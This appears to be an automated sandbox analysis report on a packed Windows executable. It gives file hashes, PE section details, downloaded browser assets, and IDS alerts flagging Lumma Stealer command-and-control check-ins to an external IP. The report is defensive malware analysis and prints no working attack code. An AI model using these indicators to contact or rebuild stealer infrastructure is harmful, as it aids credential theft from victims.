                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                        Category:downloaded
                                                                                                                                                                        Size (bytes):16
                                                                                                                                                                        Entropy (8bit):3.875
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:HMB:k
                                                                                                                                                                        MD5:0B04EA412F8FC88B51398B1CBF38110E
                                                                                                                                                                        SHA1:E073BCC5A03E7BBA2A16CF201A3CED1BE7533FBF
                                                                                                                                                                        SHA-256:7562254FF78FD854F0A8808E75A406F5C6058B57B71514481DAE490FC7B8F4C3
                                                                                                                                                                        SHA-512:6D516068C3F3CBFC1500032E600BFF5542EE30C0EAC11A929EE002C707810BBF614A5586C2673EE959AFDF19C08F6EAEFA18193AD6CEDC839BDF249CF95E8079
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzQSEAkEurwx6c-nJBIFDb_mJfI=?alt=proto
                                                                                                                                                                        Preview:CgkKBw2/5iXyGgA=
                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                        Category:downloaded
                                                                                                                                                                        Size (bytes):13339
                                                                                                                                                                        Entropy (8bit):7.683569563478597
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:zjSKAj04ndWb6OuzZjk6TsEaJS0/bJur2Gz4Imm3MhE4NfM:zutfW69XTspsG3G0TfhEQM
                                                                                                                                                                        MD5:512625CF8F40021445D74253DC7C28C0
                                                                                                                                                                        SHA1:F6B27CE0F7D4E48E34FDDCA8A96337F07CFFE730
                                                                                                                                                                        SHA-256:1D4DCEE8511D5371FEC911660D6049782E12901C662B409A5C675772E9B87369
                                                                                                                                                                        SHA-512:AE02319D03884D758A86C286B6F593BDFFD067885D56D82EEB8215FDCB41637C7BB9109039E7FBC93AD246D030C368FB285B3161976ED485ABC5A8DF6DF9A38C
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-changes-complete.png
                                                                                                                                                                        Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..3.IDATx^..].5Y...C.$..tH .NF.I&A0..;.r.fF.#..!7...'..3.0.../..s....."!.y...~....4....om.g.3.BTP......j..g.zVU....u...a.Z..j..U....y......$.....I...pAR...\.T....$.....I...pAR...\.T..p....5O>.d...}Rg.$....@.4....fb1.o.I...7..<.P.....n0.D.P.....n..L.P.....n8.......P.~......n(+..'. ......J.vM,H*......W...h.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$......'....w....g....|../5_.......T...~.y.'.'.|...W..[...C.)......|.[.[WK...w...w..y.{..|.#.n>...5....5...h>..O6O>.Xx....o.B........g?.........~....?o...w.......}..-_k^........l....|.D.TH.....o..B'..(.W-%...?...W.......E?h..........~.......?...~,..}...o^...5ox..bI.mo{[s.}.5.<.L.......<......Y.W......K..Q._...Iu...2...e)d]4.}Y..............k.%k..s.'..L(..o4...g...z*............N.X.....W.O.^.4.....7......i~._7..~,bI......3.0RRq..|.Mk..?.{.K_...t.........SYG.W^#).N^..._W...(.8.7.....W....7...m
                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                                                                                                                        Category:downloaded
                                                                                                                                                                        Size (bytes):17174
                                                                                                                                                                        Entropy (8bit):2.9129715116732746
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                                                                                                                        MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                                                                                                                        SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                                                                                                                        SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                                                                                                                        SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        URL:https://learn.microsoft.com/favicon.ico
                                                                                                                                                                        Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        File Type:ASCII text, with very long lines (46884)
                                                                                                                                                                        Category:downloaded
                                                                                                                                                                        Size (bytes):1817143
                                                                                                                                                                        Entropy (8bit):5.501007973622959
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:24576:aLX8PHFluFxBSB1DkCXWjfz8gEPPXL/tie:auHFluFxBSB1DkCXWjfz7EPPXztH
                                                                                                                                                                        MD5:F57E274AE8E8889C7516D3E53E3EB026
                                                                                                                                                                        SHA1:F8D21465C0C19051474BE6A4A681FA0B0D3FCC0C
                                                                                                                                                                        SHA-256:2A2198DDBDAEDD1E968C0A1A45F800765AAE703675E419E46F6E51E3E9729D01
                                                                                                                                                                        SHA-512:9A9B42F70E09D821B799B92CB6AC981236FCF190F0A467CA7F7D382E3BCA1BC1D71673D37CD7426499D24DFBC0B7A6D10676C0E3FB2B0292249A5ABAB78F23F4
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        URL:https://learn.microsoft.com/static/assets/0.4.028726178/scripts/en-us/index-docs.js
                                                                                                                                                                        Preview:"use strict";(()=>{var hve=Object.create;var _T=Object.defineProperty;var E2=Object.getOwnPropertyDescriptor;var bve=Object.getOwnPropertyNames;var _ve=Object.getPrototypeOf,vve=Object.prototype.hasOwnProperty;var yve=(e,t,o)=>t in e?_T(e,t,{enumerable:!0,configurable:!0,writable:!0,value:o}):e[t]=o;var Ie=(e,t)=>()=>(t||e((t={exports:{}}).exports,t),t.exports);var xve=(e,t,o,n)=>{if(t&&typeof t=="object"||typeof t=="function")for(let r of bve(t))!vve.call(e,r)&&r!==o&&_T(e,r,{get:()=>t[r],enumerable:!(n=E2(t,r))||n.enumerable});return e};var Ya=(e,t,o)=>(o=e!=null?hve(_ve(e)):{},xve(t||!e||!e.__esModule?_T(o,"default",{value:e,enumerable:!0}):o,e));var U=(e,t,o,n)=>{for(var r=n>1?void 0:n?E2(t,o):t,s=e.length-1,i;s>=0;s--)(i=e[s])&&(r=(n?i(t,o,r):i(r))||r);return n&&r&&_T(t,o,r),r};var ji=(e,t,o)=>(yve(e,typeof t!="symbol"?t+"":t,o),o),yR=(e,t,o)=>{if(!t.has(e))throw TypeError("Cannot "+o)};var wt=(e,t,o)=>(yR(e,t,"read from private field"),o?o.call(e):t.get(e)),Bo=(e,t,o)=>{if(t.has(
                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):5644
                                                                                                                                                                        Entropy (8bit):4.785769732002188
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:ogVOjPW7cI3aDNjExAjfWQpL0dpwmWMv7AD8RevyvRJNjyZPtJ27RlhiewZjMeZf:og5cUaDNjESLWQN0dpwm9+6DlUu7lYjX
                                                                                                                                                                        MD5:B5885C991E30238110973653F2408300
                                                                                                                                                                        SHA1:39B0A79D951F8254E21821134E047C76F57AD2A8
                                                                                                                                                                        SHA-256:085BF5AE32E6F7F1299CA79248B0CB67EBD31566728A69F4466E1659C004732E
                                                                                                                                                                        SHA-512:6BEC209D933C7A1065047637F550B7A36809D835938C04851A3B09DF644BD3EC85A2CE30F73FCFB709FE7AF3453799B2EB76702D0AB2BE067CD07D2EC03537C0
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:{"brandLink":{"biName":"learn","displayName":"Learn","href":"/"},"featuredContent":[{"biName":"1-microsoft-learn-for-organizations","description":"Access curated resources to upskill your team and close skills gaps.","href":"/training/organizations/","supertitle":"Microsoft Learn for Organizations","title":"Boost your team\u0027s technical skills"}],"metadata":{"git_commit_id":"dab49ca79cb372010aeaec5e99463f6cec8df000"},"navCategories":[{"biName":"1-discover","panel":{"panelContent":[{"biName":"1-documentation","componentType":"header-panel-card","description":"In-depth articles on Microsoft developer tools and technologies","href":"/docs/","title":"Documentation"},{"biName":"2-training","componentType":"header-panel-card","description":"Personalized learning paths and courses","href":"/training/","title":"Training"},{"biName":"3-credentials","componentType":"header-panel-card","description":"Globally recognized, industry-endorsed credentials","href":"/credentials/","title":"Credential
                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):17174
                                                                                                                                                                        Entropy (8bit):2.9129715116732746
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                                                                                                                        MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                                                                                                                        SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                                                                                                                        SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                                                                                                                        SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        File Type:PNG image data, 658 x 480, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                        Category:downloaded
                                                                                                                                                                        Size (bytes):13842
                                                                                                                                                                        Entropy (8bit):7.802399161550213
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:NLNf+jBQsDHg7av3EEondO8PuRu2mIYXEIiDm42NpsHFMHfgnJ4K2DVwv:NLt+1jDmY+ndXwjLUpiDwpzfwoDVk
                                                                                                                                                                        MD5:F6EC97C43480D41695065AD55A97B382
                                                                                                                                                                        SHA1:D9C3D0895A5ED1A3951B8774B519B8217F0A54C5
                                                                                                                                                                        SHA-256:07A599FAB1E66BABC430E5FED3029F25FF3F4EA2DD0EC8968FFBA71EF1872F68
                                                                                                                                                                        SHA-512:22462763178409D60609761A2AF734F97B35B9A818EC1FD9046AFAB489AAD83CE34896EE8586EFE402EA7739ECF088BC2DB5C1C8E4FB39E6A0FC5B3ADC6B4A9B
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/install-3-5.png
                                                                                                                                                                        Preview:.PNG........IHDR................1....sRGB.........gAMA......a.....pHYs..........o.d..5.IDATx^..[.,.]...../<.!.B(/y..).F\r...!(.H..a ..B.~..A..KXA.M...6..8...!1....l./.X.1....2.`.y"l..R...V.....{...}._gWW.Z.VUw.N...U..P@..... ..@.A...".$..E.I.........$..("H..PD..... ..p....U.}.{.....l..A.....A........s.......D.0...@....E..x........L. /.".A.....$...Y."...%.I..["../.&.I..[`.0..IA.........p4.I.........$..("H..PD..... ..@.A...".$..E.I.........$..("H..PD..... ..@.A...".$..E.>H...O.................?.~.......].7.....a?....(H....m.G..G..a.P..?yo......f?...o. .B.....mo{[....:9<].....7.....a.....S..Cd.5,.R....#....>......._g.....Wo|.....z.g.........w.T...]x.>.....y(.........6....[..px...U....~.~hu...}H.......~.L... ....r...iY.$..Id..Ax"../....._..U....OTo|.Mh.km..A.k..k....n.C`|._\=...o...a.e.. ...&.A2..k.. ....X.+...C..P....y..>.{._..(H....8(.?...w.}M.........:s_!.m.........BY..T..z.5{.W.~..6.....F....bq....m.....?.......v....o..o...ki...iX.$......\]V...V...
                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        File Type:ASCII text, with very long lines (33148), with no line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):33148
                                                                                                                                                                        Entropy (8bit):4.917595394577667
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:384:FnvJOb4OLIch+KCnMet7NPXlJl+HjZjBTRdE0zIwHdZ4vNNpUjV8din4E9hLUuro:5hOEO8chkMet7pCjBfcHkWOzUuro
                                                                                                                                                                        MD5:C4DE3932AA578FA03847604F09660315
                                                                                                                                                                        SHA1:5EFBA9D7F437AF4786560559FBF162C4475AAD4F
                                                                                                                                                                        SHA-256:7683C2566CBF3C67F1A645891CC7B4DE7D143FE40E0271E106AB55E90EF9C5A8
                                                                                                                                                                        SHA-512:3DCA7F8C7C2997D473B2B80916F3E976167BA06300E915CB301DB2A024A826B9E8D3A60B6111835A5FB9A3273B4080D89351F664F9CC410C18B7F76327C326AE
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:{"items":[{"href":"./","toc_title":".NET Framework documentation"},{"href":"get-started/overview","toc_title":"Overview of .NET Framework"},{"children":[{"href":"get-started/","toc_title":"Overview"},{"href":"get-started/out-of-band-releases","toc_title":"Out-of-band releases"},{"href":"get-started/system-requirements","toc_title":"System requirements"}],"toc_title":"Get started"},{"children":[{"href":"install/","toc_title":"Overview"},{"href":"install/guide-for-developers","toc_title":"For developers"},{"children":[{"href":"install/on-windows-11","toc_title":"Windows 11"},{"href":"install/on-windows-10","toc_title":"Windows 10 and Windows Server 2016"},{"href":"install/on-windows-8-1","toc_title":"Windows 8.1 and Windows Server 2012 R2"},{"href":"install/on-windows-8","toc_title":"Windows 8 and Windows Server 2012"},{"href":"install/on-server-2022","toc_title":"Windows Server 2022"},{"href":"install/on-server-2019","toc_title":"Windows Server 2019"}],"toc_title":"By OS version"},{"hre
                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                        Category:downloaded
                                                                                                                                                                        Size (bytes):5644
                                                                                                                                                                        Entropy (8bit):4.785769732002188
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:ogVOjPW7cI3aDNjExAjfWQpL0dpwmWMv7AD8RevyvRJNjyZPtJ27RlhiewZjMeZf:og5cUaDNjESLWQN0dpwm9+6DlUu7lYjX
                                                                                                                                                                        MD5:B5885C991E30238110973653F2408300
                                                                                                                                                                        SHA1:39B0A79D951F8254E21821134E047C76F57AD2A8
                                                                                                                                                                        SHA-256:085BF5AE32E6F7F1299CA79248B0CB67EBD31566728A69F4466E1659C004732E
                                                                                                                                                                        SHA-512:6BEC209D933C7A1065047637F550B7A36809D835938C04851A3B09DF644BD3EC85A2CE30F73FCFB709FE7AF3453799B2EB76702D0AB2BE067CD07D2EC03537C0
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        URL:https://learn.microsoft.com/en-us/content-nav/site-header/site-header.json?
                                                                                                                                                                        Preview:{"brandLink":{"biName":"learn","displayName":"Learn","href":"/"},"featuredContent":[{"biName":"1-microsoft-learn-for-organizations","description":"Access curated resources to upskill your team and close skills gaps.","href":"/training/organizations/","supertitle":"Microsoft Learn for Organizations","title":"Boost your team\u0027s technical skills"}],"metadata":{"git_commit_id":"dab49ca79cb372010aeaec5e99463f6cec8df000"},"navCategories":[{"biName":"1-discover","panel":{"panelContent":[{"biName":"1-documentation","componentType":"header-panel-card","description":"In-depth articles on Microsoft developer tools and technologies","href":"/docs/","title":"Documentation"},{"biName":"2-training","componentType":"header-panel-card","description":"Personalized learning paths and courses","href":"/training/","title":"Training"},{"biName":"3-credentials","componentType":"header-panel-card","description":"Globally recognized, industry-endorsed credentials","href":"/credentials/","title":"Credential
                                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                        Entropy (8bit):7.950077060012696
                                                                                                                                                                        TrID:
                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                        File name:file.exe
                                                                                                                                                                        File size:1'845'760 bytes
                                                                                                                                                                        MD5:1cf0d9bb6174853f764aaba59a7cd239
                                                                                                                                                                        SHA1:39f4f9c5c7c3a38bd704d3e7e011b5cff63e35e8
                                                                                                                                                                        SHA256:fb1dcb1d52ec39fefd8fc2311824d6795911709e8e16f42e0038ecfc68f49c4e
                                                                                                                                                                        SHA512:f55e4359a4d9b9fd032e49c9e9d9f42cdffbbb94588e25c23191dac93b2656a254ff330872989e119c543e3582f27a829bfbfde06860b7618a518bbd3e80a8f6
                                                                                                                                                                        SSDEEP:24576:pBBguje9JoRa//7rP8sI1e8RZkrHz9nTavX2Lh/gLM4POdeJfsOWM1uIoAyz2lVc:bBg8M3ELeukrRTYGNYo00OhsAsNrEGx
                                                                                                                                                                        TLSH:CE8533879502DD02EDF800FF02E82B2C3A754A44D68B7F2F4B245958FA73D56DBB94A4
                                                                                                                                                                        File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...Q<?g............................. I...........@..........................PI.....<.....@.................................\...p..
                                                                                                                                                                        Icon Hash:00928e8e8686b000
                                                                                                                                                                        Entrypoint:0x892000
                                                                                                                                                                        Entrypoint Section:.taggant
                                                                                                                                                                        Digitally signed:false
                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                                        Time Stamp:0x673F3C51 [Thu Nov 21 13:57:37 2024 UTC]
                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                        OS Version Major:6
                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                        File Version Major:6
                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                        Subsystem Version Major:6
                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                        Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                                                                                                                        Instruction
                                                                                                                                                                        jmp 00007FE1C87FCB6Ah
                                                                                                                                                                        invd
                                                                                                                                                                        sbb al, 00h
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        jmp 00007FE1C87FEB65h
                                                                                                                                                                        add byte ptr [edi], al
                                                                                                                                                                        or al, byte ptr [eax]
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [edi], al
                                                                                                                                                                        or al, byte ptr [eax]
                                                                                                                                                                        add byte ptr [ebx], cl
                                                                                                                                                                        or al, byte ptr [eax]
                                                                                                                                                                        add byte ptr [edx+ecx], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        push es
                                                                                                                                                                        or al, byte ptr [eax]
                                                                                                                                                                        add byte ptr [edx], al
                                                                                                                                                                        or al, byte ptr [eax]
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [ecx], al
                                                                                                                                                                        add byte ptr [eax], 00000000h
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        adc byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add ecx, dword ptr [edx]
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        adc byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        push es
                                                                                                                                                                        or al, byte ptr [eax]
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x5805c0x70.idata
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x570000x2b0.rsrc
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x581f80x8.idata
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                        0x10000x560000x26200e4699c097094b61fbba624ffab824fc0False0.9992635758196722data7.979884343292066IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                        .rsrc0x570000x2b00x2006bf7f87ee49f1a4d5479097692f70937False0.796875data6.0174474390978405IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                        .idata 0x580000x10000x200c92ced077364b300efd06b14c70a61dcFalse0.15625data1.1194718105633323IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                        0x590000x29f0000x200c52b73a81709a92880c1902ea17c08daunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                        obdpnpls0x2f80000x1990000x198a009e936ad7e606c3be5e3912f3bafe5254False0.9942487668247171data7.954366590054844IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                        nxyctjky0x4910000x10000x6002a347871ed95fb51b1a0784e698e96baFalse0.525390625data4.776935310501065IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                        .taggant0x4920000x30000x2200c5cac35bfd7fdc637bd77ec582b41281False0.06433823529411764DOS executable (COM)0.8280065942906116IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                        RT_MANIFEST0x4905fc0x256ASCII text, with CRLF line terminators0.5100334448160535
                                                                                                                                                                        DLLImport
                                                                                                                                                                        kernel32.dlllstrcpy
                                                                                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                        2024-11-24T05:11:19.681078+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749703104.21.33.116443TCP
                                                                                                                                                                        2024-11-24T05:11:20.382137+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.749703104.21.33.116443TCP
                                                                                                                                                                        2024-11-24T05:11:20.382137+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.749703104.21.33.116443TCP
                                                                                                                                                                        2024-11-24T05:11:21.730278+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749705104.21.33.116443TCP
                                                                                                                                                                        2024-11-24T05:11:22.418578+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.749705104.21.33.116443TCP
                                                                                                                                                                        2024-11-24T05:11:22.418578+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.749705104.21.33.116443TCP
                                                                                                                                                                        2024-11-24T05:11:24.025707+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749711104.21.33.116443TCP
